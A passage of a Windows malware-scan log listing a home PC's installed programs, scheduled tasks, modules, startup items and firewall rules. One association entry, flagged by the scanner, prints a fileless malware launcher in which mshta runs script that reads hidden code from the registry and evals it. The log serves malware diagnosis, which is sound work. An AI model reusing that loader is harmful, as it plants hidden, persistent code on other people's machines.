Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50905.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{51adbf11-493f-431c-a862-967a0fae2944}) (Version: 12.0.21005.1 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\Minecraft) (Version: 1.8.8 - Minecraft)
Minimal ADB and Fastboot version 1.4.2 (HKLM-x32\...\{1901BAF7-7E78-4041-BC88-D0EE5DD1DFD9}_is1) (Version: 1.4.2 - Sam Rodberg)
Mount and Blade Warband - Viking Conquest (HKLM-x32\...\Mount and Blade Warband - Viking Conquest_is1) (Version: - )
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.62.1 - Black Tree Gaming)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.4.0.70 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.4.0.70 - NVIDIA Corporation)
NVIDIA Ovladač 3D Vision 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.3.34.17 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.17 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 376.53 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 376.53 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NvNodejs (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.3.16.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
O&O Defrag Professional (HKLM\...\{50C961A1-889F-4A4E-9587-2772A45B6AAD}) (Version: 18.0.39 - O&O Software GmbH)
OpenOffice 4.1.1 (HKLM-x32\...\{C560D6E7-E40A-435D-8B71-62CBCF1701B2}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.103.32.0 - Overwolf Ltd.)
Ovládací panel NVIDIA 376.53 (Version: 376.53 - NVIDIA Corporation) Hidden
Path of Exile (HKLM-x32\...\{52797cef-39ff-4ea9-b055-4f9a336b412d}) (Version: 2.2.1.53465 - Grinding Gear Games)
Path of Exile (x32 Version: 2.2.1.53465 - Grinding Gear Games) Hidden
Počítačová aplikace Autodesk (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Process Lasso (HKLM-x32\...\ProcessLasso) (Version: 8.9.8.6 - Bitsum)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Shadow.Warrior.2.Deluxe.Edition.[v.1.1.3.0]-ALI213 verze 1.1.3.0 (HKLM-x32\...\{ACB6FC5F-552D-4C67-A0F5-25555114841B}}_is1) (Version: 1.1.3.0 - Ali213.net)
Shelter 2 Mountains (HKLM-x32\...\Shelter 2 Mountains_is1) (Version: - )
SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter)
Simple Port Forwarding (HKLM-x32\...\Simple Port Forwarding) (Version: 3.8.5 - PcWinTech.com)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.26 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.26.101 - Skype Technologies S.A.)
Skyrim Script Extender (SKSE) (HKLM\...\Steam App 365720) (Version: - The SKSE Team)
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.6 - Sophos Limited)
Speciální aplikace Autodesk 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version: - )
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Sync withSIX (HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Sync) (Version: 1.2.7 - SIX Networks GmbH)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Elder Scrolls V: Skyrim (HKLM\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.7 - Tunngle.net GmbH)
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
Vietcong (HKLM-x32\...\Vietcong) (Version: - )
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
War Thunder (HKLM-x32\...\Steam App 236390) (Version: - Gaijin Entertainment)
WibuKey Setup (WibuKey Remove) (HKLM\...\{00060000-0000-1004-8002-0000C06B5161}) (Version: Version 6.20 of 2013-Dec-18 (Build 1230) (Setup) - WIBU-SYSTEMS AG)
WinRAR 5.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
Zemana AntiMalware (HKLM-x32\...\{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.72.0.176 - Zemana Ltd.)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-2417313614-488722605-2671369154-1001_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0A6FCFBF-96B1-40CB-97E3-794BCDC6F58D} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {0BCFA1A1-1EC5-4C87-9B57-941443E89977} - System32\Tasks\{7FD848FE-342B-446D-9D31-7734C94947D8} => pcalua.exe -a C:\Users\Nekut\Downloads\gtasa120cz\gtasa120cz.exe -d C:\Users\Nekut\Downloads\gtasa120cz
Task: {14D797F9-BB6D-4144-9C3D-88C2500CDCBF} - System32\Tasks\COMODO\COMODO CMC {06A09C0F-DD9C-4191-A670-71115CD78627} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {196522D8-4BD8-4B31-9FB8-ACCC7A483E1C} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {325CB902-3891-4E6E-BA9D-28F802BC176F} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {3A6CCA04-E5F4-4F90-A680-A9A5F23F824A} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-12-28] (COMODO)
Task: {49E243E0-ACAD-4373-A823-590D9DB02FB3} - System32\Tasks\COMODO\COMODO Scan {F140D794-60B6-4F00-9235-D6457AA25B22} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {5A92D064-2115-424F-B351-9FC49340E33C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {6899F673-0F07-468E-91E7-4E56DB0619BD} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe
Task: {6D5927DD-BEE1-4A03-B7E2-2F0A02CC0EAF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-26] (Adobe Systems Incorporated)
Task: {77FC23CE-5778-4997-86B6-0AF9DAB6C840} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {8018887D-23B5-49E9-8F6E-9CB31F63A62B} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-02-23] (NVIDIA Corporation)
Task: {9C974213-F562-4CFD-9A9D-4D8A098C7FC6} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-03-14] (Microsoft Corporation)
Task: {A345A326-3A14-4A3E-94B7-67267B52B398} - System32\Tasks\COMODO\COMODO Maintenance {947247B5-026A-4437-9371-770782BE839D} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-12-28] (COMODO)
Task: {A4444133-6A7C-4E6D-B090-92C841E301BC} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {AD71B9D6-2F01-49C5-B83B-76A1EA3B8567} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-11-15] (Piriform Ltd)
Task: {B0A7E0C4-9457-4CE3-848D-39E42D97A27E} - System32\Tasks\Process Lasso Core Engine Only => C:\Program Files\Process Lasso\processgovernor.exe [2016-05-14] (Bitsum LLC)
Task: {CD657602-AFE7-44B3-9A17-AEFCE46EFB45} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-02-23] (NVIDIA Corporation)
Task: {D8F861CA-EAE2-4146-859A-E6905C624F61} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-02-23] (NVIDIA Corporation)
Task: {DA40F702-D2CF-4F91-9255-A83784B68B66} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-23] (NVIDIA Corporation)
Task: {DAAE4093-1005-4A30-B9A8-A828D3FF22D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-26] (Google Inc.)
Task: {E47E59FE-19EC-43C8-B8ED-E60CA8049AF6} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EC723377-1EB3-4815-804B-63A20A982CCA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-23] (NVIDIA Corporation)
Task: {EF979201-DB6D-4829-A4FF-7E323A52458E} - System32\Tasks\Process Lasso Management Console (GUI) => C:\Program Files\Process Lasso\processlasso.exe [2016-05-14] (Bitsum LLC)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
Shortcut: C:\Users\Nekut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Simple Port Forwarding\SPF - Basic UI Mode.lnk -> C:\Program Files (x86)\Simple Port Forwarding\basic_ui.bat ()
==================== Loaded Modules (Whitelisted) ==============
2016-10-01 14:49 - 2017-02-23 19:35 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-03-15 17:30 - 2017-02-24 06:23 - 02264528 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2016-12-28 00:17 - 2016-12-28 00:17 - 00155320 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdwrhlp.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00107704 _____ () C:\Program Files\COMODO\COMODO Internet Security\cavwpps.dll
2016-12-28 00:16 - 2016-12-28 00:16 - 00179896 _____ () C:\Program Files\COMODO\COMODO Internet Security\cmdcomps.dll
2016-03-16 10:25 - 2016-03-16 10:25 - 00073912 _____ () C:\Program Files\COMODO\COMODO Internet Security\scanners\smart.cav
2016-07-16 12:42 - 2016-07-16 12:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-09-27 18:02 - 2016-12-29 13:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2017-03-14 18:35 - 2017-03-04 08:19 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-27 18:57 - 2016-09-27 18:57 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 18:34 - 2017-03-04 07:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-14 18:35 - 2017-03-04 07:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-03-14 18:35 - 2017-03-04 07:05 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-03-14 18:35 - 2017-03-04 07:08 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-03-13 16:26 - 2017-03-13 16:26 - 00182784 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 41048064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 02236896 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\roottools.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00165376 _____ () C:\Program Files\Autodesk\Autodesk Sync\qjson_Ad_0.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00050176 _____ () C:\Program Files\Autodesk\Autodesk Sync\QtSolutions_MFCMigrationFramework_Ad_2.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00062464 _____ () C:\Program Files\Autodesk\Autodesk Sync\qoauth_Ad_1.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00932864 _____ () C:\Program Files\Autodesk\Autodesk Sync\qca_Ad_2.dll
2016-11-15 21:25 - 2016-11-15 21:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1029.dll
2016-07-16 12:42 - 2016-07-16 12:42 - 01872384 _____ () C:\Windows\System32\speech_onecore\engines\tts\MSTTSEngine_OneCore.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00061968 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00110608 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-01 14:49 - 2017-02-23 19:34 - 65708992 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-01 14:49 - 2017-02-23 15:30 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00252352 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-01 14:49 - 2017-02-23 15:30 - 02443320 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00385592 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00543288 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00468536 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-12-02 18:51 - 2013-09-23 18:52 - 00043912 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_MFCMigrationFramework_Ad_2.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00052224 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qoauth_Ad_1.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00195584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson_Ad_0.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00742400 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qca_Ad_2.dll
2016-12-02 18:51 - 2016-07-01 07:05 - 00285632 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\cs-CZ\AdWingManRes.dll
2016-12-02 18:51 - 2015-09-08 07:31 - 40640808 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libcef.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00912384 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libglesv2.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00134144 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libegl.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00950272 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\ffmpegsumo.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\.scr: AutoCADScriptFile => C:\WINDOWS\system32\notepad.exe "%1"
HKU\.DEFAULT\Software\Classes\d313270: "C:\WINDOWS\system32\mshta.exe" "javascript:TW9QKQ5="M";W1H=new ActiveXObject("WScript.Shell");dyF0py="TdPGlWw";pLJ3D=W1H.RegRead("HKCU\\software\\evzi\\ivvn");grWNe4t7="hCDpe";eval(pLJ3D);Atr0SAD="gO8Gu";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-10 12:04 - 2017-03-15 21:01 - 00000753 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nekut\Downloads\20_15544_8b2ef1afed30ce1.jpg
DNS Servers: 192.168.1.20 - 192.168.10.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
==================== MSCONFIG/TASK MANAGER disabled items ==
HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Overwolf"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Steam"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{2C739945-6CE6-401C-8A56-413B9047BC52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{CEC4E7E5-5CA4-4D2E-8536-AF3057B4112F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{C64359FC-D344-466D-81FC-4B5A7D613C8A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A3A84145-F305-4467-80F6-E8F059E7B38C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{28BF43FB-6E17-4BC9-B664-FE60A3E1F795}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
FirewallRules: [TCP Query User{960FC5A6-B689-4D0C-8CB3-5B6B13E8A252}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
